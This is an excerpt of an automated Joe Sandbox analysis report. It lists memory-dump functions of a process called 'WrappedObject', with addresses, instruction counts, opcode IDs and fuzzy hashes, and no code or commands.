                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 80bfd5a4580ab4d8d2a7dde2bdbc7c57dcffa209e3156edc63f849e68af343b5
                                                                                          • Instruction ID: db090d312aab80e817ce1a0aff0b4a1985f78055e4f0588cfe7e20e0cf2f31cf
                                                                                          • Opcode Fuzzy Hash: 80bfd5a4580ab4d8d2a7dde2bdbc7c57dcffa209e3156edc63f849e68af343b5
                                                                                          • Instruction Fuzzy Hash: F141675280E7C15FDB57A33468A81D63FA48D2362935A51DBC08CEF0B3E91A584EC3B6
                                                                                          Function 00E826B7 Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7df9d926eb402fd02c9a5127d34c8d2551c8bd73236b6730a84a88fffa029be2
                                                                                          • Instruction ID: 74d30070fdd3d7e3774322c0abebdba4a298f8cb3c8007d0b093d9ea7c05a613
                                                                                          • Opcode Fuzzy Hash: 7df9d926eb402fd02c9a5127d34c8d2551c8bd73236b6730a84a88fffa029be2
                                                                                          • Instruction Fuzzy Hash: 4C518830A04204CFD715EB69C044BEDB7B2EF84324F24D2A9D12DAB2A5D775AC86DB61
                                                                                          Function 00E8298F Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e5baddd4e1686a4159c4ea18cb6d23430f623770d8a20419033ac16864e8f579
                                                                                          • Instruction ID: d4f580ccd7254394d0b08fdd39d5971d05c4cc3b8b289718bebae06b6ae3e8eb
                                                                                          • Opcode Fuzzy Hash: e5baddd4e1686a4159c4ea18cb6d23430f623770d8a20419033ac16864e8f579
                                                                                          • Instruction Fuzzy Hash: 60415C30A01204DFDB15EB68C044BADB7B3FB88324F24D5A8D119AB3A5DB75EC42DB60
                                                                                          Function 00E826F8 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9738946168064bc80f12a12040e7887648c6c4ef123a979fa793b79be071687e
                                                                                          • Instruction ID: b21487629252eaa84201594f1da5aa97a976dcd0a9161c359bec67fe93798e6c
                                                                                          • Opcode Fuzzy Hash: 9738946168064bc80f12a12040e7887648c6c4ef123a979fa793b79be071687e
                                                                                          • Instruction Fuzzy Hash: BB413A34A00204DFDB15EB68C444BADB7B3FB88324F24D5A8D1196B3A5DB75EC46DB60
                                                                                          Function 00E8295D Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 24cbeaa81baac6c2b2ecf20eca21a1e1ba1ee1f46178f612c5be4895313bebd7
                                                                                          • Instruction ID: f8b2a17a6973f76e88485bfef089df1923cb5a13fc0d9b47355a85a8b81abcd8
                                                                                          • Opcode Fuzzy Hash: 24cbeaa81baac6c2b2ecf20eca21a1e1ba1ee1f46178f612c5be4895313bebd7
                                                                                          • Instruction Fuzzy Hash: FD415C30A00204DFDB15EB68C044BAD77B3FF84324F6496A8D11DAB3A5DB769C46DB60
                                                                                          Function 00E828EA Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f07897bc1c7f939cc72ae9ffff86b8b729700c0ac3db862a5138d137cacaaff
                                                                                          • Instruction ID: eb5af24225100973787348e76881ea8cc549df03edf7104aee0ed0fcaa4aa536
                                                                                          • Opcode Fuzzy Hash: 7f07897bc1c7f939cc72ae9ffff86b8b729700c0ac3db862a5138d137cacaaff
                                                                                          • Instruction Fuzzy Hash: 1B415730A00204DFDB15EB68C044BEDB7B3BB84324F6492A8D11DAB2A4DB769C46DB60
                                                                                          Function 00E8284E Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 25b29ea44c802d214cede6f4886e1534f989b6f50a2c39e9bd78fe8b815ca535
                                                                                          • Instruction ID: f60014e3dbaec6b924a8a4f5440ef4ef22b5b34bab46c14087544be4cff45af1
                                                                                          • Opcode Fuzzy Hash: 25b29ea44c802d214cede6f4886e1534f989b6f50a2c39e9bd78fe8b815ca535
                                                                                          • Instruction Fuzzy Hash: 70413930A00204DFD715EB69C044BEDB7B3BB84324F64D6A8D11DAB2A5DB769C46DB60
                                                                                          Function 00E826E8 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 476a25ef57c99ab79f0162ca5ef9d2df5415ffea29063787a1d607b016db81b3
                                                                                          • Instruction ID: 04b03331e4dd4eecb62d3e72e4cb7e387a1acae064de9b8178d6e30538a7fd6e
                                                                                          • Opcode Fuzzy Hash: 476a25ef57c99ab79f0162ca5ef9d2df5415ffea29063787a1d607b016db81b3
                                                                                          • Instruction Fuzzy Hash: 2C414830A00204DFDB15EB68C044BEDB7B2FF88324F64D6A9D119AB3A5D775AC46DB60
                                                                                          Function 00E829E4 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4ecde6319fe2ad6f2220f234d1e121b8672bb76e6da37798393358519978a464
                                                                                          • Instruction ID: df18fb14118e280cd086f031928fdb57c77a79e96f5f1b1f529ca08b6d7f060a
                                                                                          • Opcode Fuzzy Hash: 4ecde6319fe2ad6f2220f234d1e121b8672bb76e6da37798393358519978a464
                                                                                          • Instruction Fuzzy Hash: 37313930A00204DFDB15EB68C444BADB7B2FB84324F6495A8D11DAB3A5D775EC46DB60
                                                                                          Function 00E82A26 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6fe01e61830239542d8e5c6039d74e5d04c63f24c716cb8db1d30c9cb0f48da5
                                                                                          • Instruction ID: 83beb1611cec64924070945253d92b58b99315005b95819441a073cf9ab6dff0
                                                                                          • Opcode Fuzzy Hash: 6fe01e61830239542d8e5c6039d74e5d04c63f24c716cb8db1d30c9cb0f48da5
                                                                                          • Instruction Fuzzy Hash: 54318A30A04204DFDB15EB68C044BADB7B2FF84324F6491A8D11DAB2A5DB769C46DB60
                                                                                          Function 00E82A0D Relevance: .1, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a18006f545a96d1443e000e7182ce4ee0bb313487aecea18bc2b6f871b625ea
                                                                                          • Instruction ID: 7930a007155abeb6294f9703392bc96d603256b37c53460ef98157341200a709
                                                                                          • Opcode Fuzzy Hash: 9a18006f545a96d1443e000e7182ce4ee0bb313487aecea18bc2b6f871b625ea
                                                                                          • Instruction Fuzzy Hash: E8316A30A01204DFDB15EB68C044BEDB7B3FF84324F6496A8D11DAB2A5DB769C46DB60
                                                                                          Function 00E826DE Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a3aa3d9296dca4889060953e2457e020365bc9b59f0a3ecb5bb79afd47100a9
                                                                                          • Instruction ID: e48f0147e730eb497b321179effc5c17d5e3d8a77028b1bd4bf375bd5f0669c9
                                                                                          • Opcode Fuzzy Hash: 1a3aa3d9296dca4889060953e2457e020365bc9b59f0a3ecb5bb79afd47100a9
                                                                                          • Instruction Fuzzy Hash: 63318C30A00204CFD715EB68C044BEDB7B2FF84324F6492A8D11D6B3A5D776AC45DB60
                                                                                          Function 00E826C2 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ea5b1a67449a0bdcd070849e5bfd8a2dedd65db05d1a52b109cb2ee928b6eed5
                                                                                          • Instruction ID: f62695516ba1cf532f37e778986b92d56e6aa96c8825e11febb941e5a4c572fb
                                                                                          • Opcode Fuzzy Hash: ea5b1a67449a0bdcd070849e5bfd8a2dedd65db05d1a52b109cb2ee928b6eed5
                                                                                          • Instruction Fuzzy Hash: 46315B30A00204DFDB15EB68C044BADB7B3FB84324F64D5A8D1196B3A5D7759C46DB60
                                                                                          Function 00E83967 Relevance: .1, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52c56bbbb47009a36c06e51ecf01e26a9a3c4fbbceef032a7145e1489d3e512e
                                                                                          • Instruction ID: 9a4e913eda228fa6df6761846c30854518062d9f8ac9e08d42746d5a213b4842
                                                                                          • Opcode Fuzzy Hash: 52c56bbbb47009a36c06e51ecf01e26a9a3c4fbbceef032a7145e1489d3e512e
                                                                                          • Instruction Fuzzy Hash: 41311570D003489FDB24DFAAC590BEEBFF5AF48710F248469E859BB250DB759A41CB90
                                                                                          Function 00E83970 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c6b698077e778946c10aeca082da38fea52e1cd69b48078545abee50f69305a
                                                                                          • Instruction ID: 4af64d353c91d7d27f473024761f41caef25d6c503e40d25203c39ccce7bff0a
                                                                                          • Opcode Fuzzy Hash: 2c6b698077e778946c10aeca082da38fea52e1cd69b48078545abee50f69305a
                                                                                          • Instruction Fuzzy Hash: 8F310370D003489FDB14DFAAC580BDEBFF5AF48750F248469E859BB250DB759A41CBA0
                                                                                          Function 00E8B308 Relevance: .1, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 88e5bf087f673877d83a8d618957ea8673204276e01f877dcd74b66ec41238b0
                                                                                          • Instruction ID: 0ce78a834e6eede4b858b53b77e6079fb88e46dab42e765bc569d2960b32c8e6
                                                                                          • Opcode Fuzzy Hash: 88e5bf087f673877d83a8d618957ea8673204276e01f877dcd74b66ec41238b0
                                                                                          • Instruction Fuzzy Hash: 3E218970908208DFDB01EFA9D8497AEBBF6FB49305F5091AAD00DF7291D7B44A85CB51
                                                                                          Function 00DED6C8 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1722945930.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_ded000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 467ec85e0a001001c835a97c7a389591ddea1d20aac62665291ad7fa05a31cb3
                                                                                          • Instruction ID: 211b99f7c25888efa70e2ebd9f47c0021f5dce4bbb86d91b4e6af152344ffb8f
                                                                                          • Opcode Fuzzy Hash: 467ec85e0a001001c835a97c7a389591ddea1d20aac62665291ad7fa05a31cb3
                                                                                          • Instruction Fuzzy Hash: 52212576504284DFDB14FF10D9C4B1ABF66FB98324F24856DE84A0B246C736D856CBB2
                                                                                          Function 00E8F138 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3cd5ac9d435f019cc36ae3b3fb22a749e56e3c55ba08422d5727588b73b56042
                                                                                          • Instruction ID: 783e13cdd92a298f994320083ba9a1649ce1e8f32f8d4abb2344e9d1c64a2a54
                                                                                          • Opcode Fuzzy Hash: 3cd5ac9d435f019cc36ae3b3fb22a749e56e3c55ba08422d5727588b73b56042
                                                                                          • Instruction Fuzzy Hash: C8214674E05209DFDB04EFA9D9483EEBBF2EB89310F209469D109B3291DB744A45CBA1
                                                                                          Function 00DFD0B4 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1723130169.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_dfd000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3367a43382e4721365659e1e40badce2763ac6fa2fcf357b7365b4f212d722fd
                                                                                          • Instruction ID: 6e6b5c38135119e3fa38dca7af20d12672d9d6fbbb4f5700ce0a9c6574b298f7
                                                                                          • Opcode Fuzzy Hash: 3367a43382e4721365659e1e40badce2763ac6fa2fcf357b7365b4f212d722fd
                                                                                          • Instruction Fuzzy Hash: 8C212571604348DFDB14DF10D9C4B26BB67FB84314F24C169EA090B245C336D81ACBB2
                                                                                          Function 074A4064 Relevance: .1, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1761946686.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_74a0000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dd8ad5c22a5ad1fcd3cc9ed837ac5c4afc351a193d123fdf3ce7f5e8b2e7cdcc
                                                                                          • Instruction ID: 9d7f637fdf904f958ccf9b5e8dd53fc0baa6b97fc470ab22e3e1f80930c4afc7
                                                                                          • Opcode Fuzzy Hash: dd8ad5c22a5ad1fcd3cc9ed837ac5c4afc351a193d123fdf3ce7f5e8b2e7cdcc
                                                                                          • Instruction Fuzzy Hash: E531C474A01228CFDB65DF28C888A9DB7F2EB89311F1184D6E80DA7351DB329E95CF40
                                                                                          Function 00E81E88 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 73941dd7eba34d89841e9dca34fcdf3272dbb07db9a14eafb283e4d0d7578f89
                                                                                          • Instruction ID: cb512461077d2bcc71a90fa3a10499393bfddf06d0503a41d577d6e80d68b168
                                                                                          • Opcode Fuzzy Hash: 73941dd7eba34d89841e9dca34fcdf3272dbb07db9a14eafb283e4d0d7578f89
                                                                                          • Instruction Fuzzy Hash: 6C21CF72E01209AFDF16EFA4D980AEDBBF6EF8A350F1081A6E505B7201DB301D15CB61
                                                                                          Function 00E8B318 Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e424811619ac23722b7e035d5da9ad3c18a477cf3d172092b6749687be173214
                                                                                          • Instruction ID: d5ebab8d295987c72d0bfa629570892e0785ff8ee9bb7a3cc6955f5252bc6319
                                                                                          • Opcode Fuzzy Hash: e424811619ac23722b7e035d5da9ad3c18a477cf3d172092b6749687be173214
                                                                                          • Instruction Fuzzy Hash: FD214770908208DFDB00EFA9D4487EEBBF6FB49305F6094A9D10EB3280DBB44A84CB11
                                                                                          Function 00E81E98 Relevance: .1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 751d1c31eb896f2e88534fd93f77ddb4bcbf54910b6056880260ab1aec653d04
                                                                                          • Instruction ID: 03a5d45fa4af766712b9b9739ee666f9d368ffe93215a40a873b83caa42b1317
                                                                                          • Opcode Fuzzy Hash: 751d1c31eb896f2e88534fd93f77ddb4bcbf54910b6056880260ab1aec653d04
                                                                                          • Instruction Fuzzy Hash: FD218C32E01208AFDF15EBA9D980AEEBBF6AF89350F109166E506B7341DA305D15CB61
                                                                                          Function 00E82637 Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d7c7d1caeef8204da1bbca4dd8a9fec71cabfa0ac9b6a8a23bd8fa34af16197
                                                                                          • Instruction ID: 6f668cc69dfa4f127ce3bb42bcd18afc61db93b4bce4e46f6bff22c32aa4bf8a
                                                                                          • Opcode Fuzzy Hash: 8d7c7d1caeef8204da1bbca4dd8a9fec71cabfa0ac9b6a8a23bd8fa34af16197
                                                                                          • Instruction Fuzzy Hash: 55112731E002089BDB199B64C814BEFBBB6DB88310F10853AD516BB394EE30590687D1
                                                                                          Function 00E8F4B0 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99041b9f2a1c57e45de09498acfd3a6bea32a4c717e40aa861f757dbc59705d4
                                                                                          • Instruction ID: e72f172e86c5340a9ca86c7349e9a1442c78b1b6733e6a6bb985e140c1f3b69b
                                                                                          • Opcode Fuzzy Hash: 99041b9f2a1c57e45de09498acfd3a6bea32a4c717e40aa861f757dbc59705d4
                                                                                          • Instruction Fuzzy Hash: F0110474D0421ADFCB08DF9AD8446EEBBF6FB88311F10903AD519B3250D7741955CBA0
                                                                                          Function 074BA570 Relevance: .1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1761946686.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_74a0000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 68c0320296acc1e56dac4a1e8c7cbfb1af40ce0d2d670846d80b1107dc9e3a2a
                                                                                          • Instruction ID: 8135c2b2b2de12ba4fbfc7d99a19d1e8a38d537f49b2cf51e9912e07a0cd4860
                                                                                          • Opcode Fuzzy Hash: 68c0320296acc1e56dac4a1e8c7cbfb1af40ce0d2d670846d80b1107dc9e3a2a
                                                                                          • Instruction Fuzzy Hash: E921E4B4E0020ADFCB15DFA8C548AEEBBF1EB49310F10846AD515A7350D7359E41CFA1
                                                                                          Function 00DED6C3 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1722945930.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_ded000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                          • Instruction ID: 55de53cd5cba44de9bc386c60a205da0e2db5927b94b72deffe00329142c1800
                                                                                          • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                          • Instruction Fuzzy Hash: A811E676504280CFCF15EF10D5C4B1ABF72FB94324F28C6A9D84A0B256C336D856CBA1
                                                                                          Function 00DFD0AF Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1723130169.0000000000DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DFD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_dfd000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fa649175a6a07c1293a0646eeb1dae1d7184f3825364c931512ed0431d75e21e
                                                                                          • Instruction ID: c8ecf41d74010fb1a2f60e9709f595a768eb0b973c12ee780b81a93892ef9d9b
                                                                                          • Opcode Fuzzy Hash: fa649175a6a07c1293a0646eeb1dae1d7184f3825364c931512ed0431d75e21e
                                                                                          • Instruction Fuzzy Hash: C711D076504284DFCB05DF10D9C4B26BF73FB84324F28C2A9D9090B656C33AD81ACBA2
                                                                                          Function 00E82530 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1724010943.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_e80000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 465af5b8ca3623f3238bf4d0ff899d7f868f64121da42f5a101c2d61733e96d1
                                                                                          • Instruction ID: f1d9d181a7cf5fbb98218fe2b7dd76ef0dce4b2250380c7303682f0db87101d8
                                                                                          • Opcode Fuzzy Hash: 465af5b8ca3623f3238bf4d0ff899d7f868f64121da42f5a101c2d61733e96d1
                                                                                          • Instruction Fuzzy Hash: B3019232E0574B8BCB118BB9D8005EEFBB2AFC6310F158316D511771A0EB70259ACBA1
                                                                                          Function 074BF598 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1761946686.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_74a0000_WrappedObject.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 59e92358ce4b31784394793d34a4a8d70ebb878d7c87165015cdb7eece125173
                                                                                          • Instruction ID: 2fc262ad160d6529ae247b034649f5b13676973693d1baea66f94dd04192d83e
                                                                                          • Opcode Fuzzy Hash: 59e92358ce4b31784394793d34a4a8d70ebb878d7c87165015cdb7eece125173
                                                                                          • Instruction Fuzzy Hash: 0B11E5B0E0020A9FDB44EFA9C8457BFBBF1FF88300F10806AD519A7355EB305A419BA1
                                                                                          Function 00DED01D Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1722945930.0000000000DED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DED000, based on PE: false
